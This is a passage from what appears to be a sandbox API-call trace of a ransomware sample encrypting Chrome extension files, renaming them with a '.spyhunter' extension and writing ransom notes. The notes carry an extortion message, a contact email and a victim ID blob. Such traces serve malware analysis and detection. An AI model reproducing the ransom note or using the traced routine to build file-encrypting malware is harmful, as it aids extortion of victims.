Flags=0x8, Size=0x2840) returned 0x2c375d8 [0158.966] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea84*=0x2800, lpOverlapped=0x0) returned 1 [0158.967] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.967] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea84*=0x2800, lpOverlapped=0x0) returned 1 [0158.968] GetProcessHeap () returned 0x2c0000 [0158.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0158.968] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.968] WriteFile (in: hFile=0x178, lpBuffer=0x270eac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x270eac4*, lpNumberOfBytesWritten=0x270ea84*=0x4, lpOverlapped=0x0) returned 1 [0158.968] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea84*=0x30, lpOverlapped=0x0) returned 1 [0158.968] CloseHandle (hObject=0x178) returned 1 [0158.968] GetProcessHeap () returned 0x2c0000 [0158.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.968] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.spyhunter") returned 172 [0158.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.spyhunter")) returned 1 [0158.969] GetProcessHeap () returned 0x2c0000 [0158.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.969] GetProcessHeap () returned 0x2c0000 [0158.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0158.969] GetProcessHeap () returned 0x2c0000 [0158.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f204c0 | out: hHeap=0x2c0000) returned 1 [0158.969] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eac8 | out: pbBuffer=0x270eac8) returned 1 [0158.969] GetProcessHeap () returned 0x2c0000 [0158.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0158.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eac0*=0x30) returned 1 [0158.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0158.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0158.970] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".txt") returned 0x0 [0158.970] GetProcessHeap () returned 0x2c0000 [0158.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0158.970] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea84*=0x2800, lpOverlapped=0x0) returned 1 [0158.972] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.972] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea84*=0x2800, lpOverlapped=0x0) returned 1 [0158.972] GetProcessHeap () returned 0x2c0000 [0158.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0158.972] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.972] WriteFile (in: hFile=0x178, lpBuffer=0x270eac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x270eac4*, lpNumberOfBytesWritten=0x270ea84*=0x4, lpOverlapped=0x0) returned 1 [0159.039] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea84*=0x30, lpOverlapped=0x0) returned 1 [0159.039] CloseHandle (hObject=0x178) returned 1 [0159.039] GetProcessHeap () returned 0x2c0000 [0159.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.040] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.spyhunter") returned 168 [0159.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.spyhunter")) returned 1 [0159.041] GetProcessHeap () returned 0x2c0000 [0159.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.041] GetProcessHeap () returned 0x2c0000 [0159.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.041] GetProcessHeap () returned 0x2c0000 [0159.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f858 | out: hHeap=0x2c0000) returned 1 [0159.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.042] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.042] WriteFile (in: hFile=0x178, lpBuffer=0x270e9f7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb20, lpOverlapped=0x0 | out: lpBuffer=0x270e9f7*, lpNumberOfBytesWritten=0x270eb20*=0x127, lpOverlapped=0x0) returned 1 [0159.042] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.042] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb20*=0x2ac, lpOverlapped=0x0) returned 1 [0159.043] CloseHandle (hObject=0x178) returned 1 [0159.043] GetProcessHeap () returned 0x2c0000 [0159.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f3c0 | out: hHeap=0x2c0000) returned 1 [0159.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.043] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.043] WriteFile (in: hFile=0x178, lpBuffer=0x270e9f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x270e9f3*, lpNumberOfBytesWritten=0x270eb1c*=0x127, lpOverlapped=0x0) returned 1 [0159.044] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.044] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb1c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.044] CloseHandle (hObject=0x178) returned 1 [0159.044] GetProcessHeap () returned 0x2c0000 [0159.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20190 | out: hHeap=0x2c0000) returned 1 [0159.045] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eab8 | out: pbBuffer=0x270eab8) returned 1 [0159.045] GetProcessHeap () returned 0x2c0000 [0159.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.045] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eab0*=0x30) returned 1 [0159.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.045] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0159.045] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.045] GetProcessHeap () returned 0x2c0000 [0159.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.045] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea74*=0xf9, lpOverlapped=0x0) returned 1 [0159.046] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.046] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x270ea74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea74*=0xf9, lpOverlapped=0x0) returned 1 [0159.047] GetProcessHeap () returned 0x2c0000 [0159.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.047] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.047] WriteFile (in: hFile=0x178, lpBuffer=0x270eab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea74, lpOverlapped=0x0 | out: lpBuffer=0x270eab4*, lpNumberOfBytesWritten=0x270ea74*=0x4, lpOverlapped=0x0) returned 1 [0159.047] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea74*=0x30, lpOverlapped=0x0) returned 1 [0159.047] CloseHandle (hObject=0x178) returned 1 [0159.047] GetProcessHeap () returned 0x2c0000 [0159.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.047] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 168 [0159.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0159.048] GetProcessHeap () returned 0x2c0000 [0159.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.048] GetProcessHeap () returned 0x2c0000 [0159.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.049] GetProcessHeap () returned 0x2c0000 [0159.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f238 | out: hHeap=0x2c0000) returned 1 [0159.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.049] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.050] WriteFile (in: hFile=0x178, lpBuffer=0x270e9eb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x270e9eb*, lpNumberOfBytesWritten=0x270eb14*=0x127, lpOverlapped=0x0) returned 1 [0159.050] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.050] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb14*=0x2ac, lpOverlapped=0x0) returned 1 [0159.051] CloseHandle (hObject=0x178) returned 1 [0159.051] GetProcessHeap () returned 0x2c0000 [0159.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1fff8 | out: hHeap=0x2c0000) returned 1 [0159.051] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eab0 | out: pbBuffer=0x270eab0) returned 1 [0159.051] GetProcessHeap () returned 0x2c0000 [0159.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eaa8*=0x30) returned 1 [0159.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0159.052] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.052] GetProcessHeap () returned 0x2c0000 [0159.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.052] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea6c*=0x102, lpOverlapped=0x0) returned 1 [0159.053] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.053] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x270ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea6c*=0x102, lpOverlapped=0x0) returned 1 [0159.053] GetProcessHeap () returned 0x2c0000 [0159.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.053] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.053] WriteFile (in: hFile=0x178, lpBuffer=0x270eaac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea6c, lpOverlapped=0x0 | out: lpBuffer=0x270eaac*, lpNumberOfBytesWritten=0x270ea6c*=0x4, lpOverlapped=0x0) returned 1 [0159.053] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea6c*=0x30, lpOverlapped=0x0) returned 1 [0159.053] CloseHandle (hObject=0x178) returned 1 [0159.054] GetProcessHeap () returned 0x2c0000 [0159.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.054] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 168 [0159.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: 